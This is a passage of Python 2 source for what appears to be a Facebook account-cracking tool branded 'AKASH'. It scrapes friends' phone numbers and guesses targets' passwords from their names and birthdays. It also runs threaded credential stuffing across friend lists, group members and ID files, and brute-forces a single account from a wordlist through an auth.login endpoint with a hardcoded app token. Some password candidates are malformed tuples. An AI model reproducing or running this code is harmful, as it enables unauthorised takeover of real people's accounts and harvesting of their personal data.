x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Multi Bruteforce Facebook"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Super Multi Bruteforce Facebook"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Yahoo Checker"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\number with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[AKASH] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[AKASH] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+'786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz5
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz6 = "Pakistan"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz7 = "Swabi123, Mardan12, Pubglover, Peshawar, Love123, Bahubali, Pak1233, Muhammad, Allah123, Ghulaman"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz7
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[AKASH] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[AKASH] \033[1;92mPassword\033[1;97m : "+pz6
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
print "\033[1;91m[!] Sorry, failed to open the target password :("
print "\033[1;91m[!] try it another way."
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
except KeyError:
print "\033[1;91m[!] Terget not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
##### Multi Brute Force #####
##### CRACK ####
def crack():
global idlist,passw,file
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
idlist = raw_input('\033[1;91m[+] \033[1;92mFile ID \033[1;91m: \033[1;97m')
passw = raw_input('\033[1;91m[+] \033[1;92mPassword \033[1;91m: \033[1;97m')
try:
file = open((idlist), "r")
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
def scrak():
global berhasil,cekpoint,gagal,back,up
try:
os.mkdir('out')
except OSError:
pass
try:
buka = open(idlist, "r")
up = buka.read().split()
while file:
username = file.readline().strip()
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(passw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == (len(up)):
break
if 'access_token' in mpsh:
bisa = open("out/mbf_ok.txt", "w")
bisa.write(username+"|"+passw+"\n")
bisa.close()
x = requests.get("https://graph.facebook.com/"+username+"?access_token="+mpsh['access_token'])
z = json.loads(x.text)
berhasil.append("\033[1;97m[ \033[1;92mAKASH_Hack\033[1;97m ] "+username+"|" +passw+" =>"+z['name'])
elif 'www.facebook.com' in mpsh["error_msg"]:
cek = open("out/mbf_cp.txt", "w")
cek.write(username+"|"+passw+"\n")
cek.close()
cekpoint.append("\033[1;97m[ \033[1;93mAKASH_CP\033[1;97m ] "+username+"|" +passw)
else:
gagal.append(username)
back +=1
sys.stdout.write('\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m:\033[1;97m '+str(back)+' \033[1;96m>\033[1;97m '+str(len(up))+' =>\033[1;92mLive\033[1;91m:\033[1;96m'+str(len(berhasil))+' \033[1;97m=>\033[1;93mCheck\033[1;91m:\033[1;96m'+str(len(cekpoint)));sys.stdout.flush()
except IOError:
print"\n\033[1;91m[!] Sleep"
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
def hasil():
print
print 42*"\033[1;97m═"
###Berhasil
for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.0)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Crack with list friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Crack from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Crack from member group"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Crack from File"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mAKASH>>> \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;91m[AKASH] \033[1;92mGet all friend id \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[AKASH] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[AKASH] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=9999999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak == "4":
os.system('reset')
print logo
try:
idlist = raw_input('\033[1;91m[AKASH] \033[1;92mFile ID \033[1;91m: \033[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;91m[!] File not found'
raw_input('\n\033[1;91m[ \033[1;97mBack \033[1;91m]')
super()
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[AKASH] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "786786","Pakistan"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "Lahore12","PakArmy"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = "Swabi123, Mardan12, Pubglover, Peshawar, Love123, Bahubali, Pak1233, Muhammad, Allah123, Ghulaman"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
else:
#Pass8
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass8 = "januari","februari","march123","april","may123","june123","juli123","augustus","september","november","december"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%252525257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;97m[ \033[1;92m✓\033[1;97m ] "+user+"|" +pass8+" =>"+z['name'])
oks.append(user+pass8)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass8+"\n")
cek.close()
cekpoint.append(user+pass8)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(0.01)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
